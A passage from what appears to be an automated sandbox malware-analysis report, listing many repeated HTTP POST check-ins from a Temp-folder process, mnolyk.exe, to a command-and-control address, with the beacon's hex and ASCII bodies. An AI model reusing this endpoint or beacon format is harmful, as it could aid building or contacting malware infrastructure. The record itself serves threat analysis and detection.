                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.572273970 CET495INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            307192.168.2.45000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:56.743695974 CET496OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.807535887 CET496INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            308192.168.2.45000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:56.978357077 CET497OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.047149897 CET497INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            309192.168.2.45000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:57.228666067 CET498OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.293574095 CET498INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.44972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:33.198313951 CET220OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:33.263086081 CET220INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            310192.168.2.45000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:57.463505983 CET499OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.532308102 CET499INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            311192.168.2.45000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:57.717411041 CET500OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.781058073 CET500INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            312192.168.2.45000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:57.964843035 CET501OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.028038979 CET501INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            313192.168.2.45000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:58.198992014 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.265856981 CET502INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            314192.168.2.45000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:58.446402073 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.511236906 CET503INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            315192.168.2.45001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:58.684720993 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.748893023 CET504INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            316192.168.2.45001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:58.917493105 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.984626055 CET505INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            317192.168.2.45001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:59.182172060 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.249001980 CET506INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            318192.168.2.45001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:59.416856050 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.484484911 CET507INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            319192.168.2.45001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:59.675888062 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.741914988 CET508INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.44972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:34.234314919 CET221OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:34.300367117 CET221INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            320192.168.2.45001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:59.919528961 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.986246109 CET509INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            321192.168.2.45001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:00.164304972 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.230684042 CET510INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            322192.168.2.45001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:00.402673006 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.467941046 CET511INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            323192.168.2.45001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:00.633702993 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.697846889 CET512INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            324192.168.2.45001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:00.869716883 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:00.937946081 CET513INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            325192.168.2.45002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:01.119659901 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
